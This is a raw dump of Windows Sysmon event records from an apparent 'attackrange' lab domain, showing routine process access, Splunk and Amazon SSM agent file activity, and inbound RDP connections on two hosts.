09:22:20.606{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056217Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:20.606{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056216Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:20.606{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056215Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:20.606{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056214Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:20.590{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056213Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:20.590{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056212Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:20.590{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056211Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:20.590{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056210Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:20.590{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056209Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:20.590{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056208Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:20.574{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056207Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:20.574{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056206Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:20.574{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056205Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:20.574{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056204Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:20.574{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056203Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:20.574{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D3B-6151-9E00-00000000FD01}5480C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001056202Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:20.222{5EBD8912-8CD0-6151-2F00-00000000FD01}2544NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\respondent-20210927092018-001MD5=418358CD28D1B50422280074BE968B1D,SHA256=C8286C1C0A91E4E2C2FF9D12E0FDD08F235EAD61265C1678C815B6AB5A1254BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056201Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:20.138{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92C1735B202D4F1895A4D26492CF1F9E,SHA256=93B3F7F8F44B1E4CB689B486FF352A458EFACDA77AA7BF7476F0CA99EC879526,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980947Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:20.066{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\surveyor-20210924073257-4319MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980949Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:21.582{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11CA78AACBAA4ABFC5BE08398625E9F5,SHA256=6F6684CB663808585F10E835513B87623C07AB19096809F765C5A175E684EED3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056226Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:21.749{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=E09394342C399D72D42AF5AFC3E18279,SHA256=16E9D14897F77A2A5122624BD9BD675736480127E6781E6C1AB913C82584588A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056225Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:21.231{5EBD8912-8CD0-6151-2F00-00000000FD01}2544NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\surveyor-20210927092016-002MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056224Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:21.200{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB454B179CC14C3EB4DAFAD29578A49D,SHA256=8361376B81EBFB464260EC8D9F22C5D6E4524790C033881C3EF0D4A4FE38F90D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056223Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:19.130{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54219-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000980953Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:19.590{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-51383-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980952Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:22.816{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D216341079475CE3C06ADBDE6DD8A0D,SHA256=78E081AC5861D295A2124BEBB54402B1C91CCCD35101FD079C35E156EDD37BD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056228Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:22.843{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F46E336FFF575D388FC6CFF255FBFEF6,SHA256=4611E4CC00ED0B7A0E9A718FA56BFDF5A9BB77388574050D6E307911EC4DBF1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056227Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:22.218{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E10E0C1E89032B5884E3DDACA16AF946,SHA256=D531F2CA73034A9903285A0508173A87C74A67013001BC2FC0E3C8468D1739D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980951Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:22.473{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DD41DF6CD53619C666D55A1850440C17,SHA256=FA4087FEDBBFAC30564426E9FE2122BD4BD8FD34342FEAA8512E7458651884E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980950Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:22.473{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5962DA358EDCA6DDEF3A5D3EE793F1FB,SHA256=60D027E184FEF2DA97872F237F7D29F05C0373551AF66AA382F2B17FBF6653B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056229Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:23.247{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=556C0726F97E4011B2844C906EBEC6FA,SHA256=9411EA77529C134E95372ECA541132A14C250AF2632D52CD519D7AA1B20BA412,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056232Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:24.247{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0539D99E39DE672693BD30146E073E0C,SHA256=7393B6042DE1A188853E5FE45787D56F5B801A867E917EB262CFAAAE678FDED4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980954Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:24.044{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B36D0A9200AC1222D687DE8B10CD425F,SHA256=695C781D8B60B3E655EFC120719CF90C7CEF50215685911D4C53E1293958BDE2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001056231Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:21.855{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-52092-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001056230Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:21.463{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-59190-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001056233Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 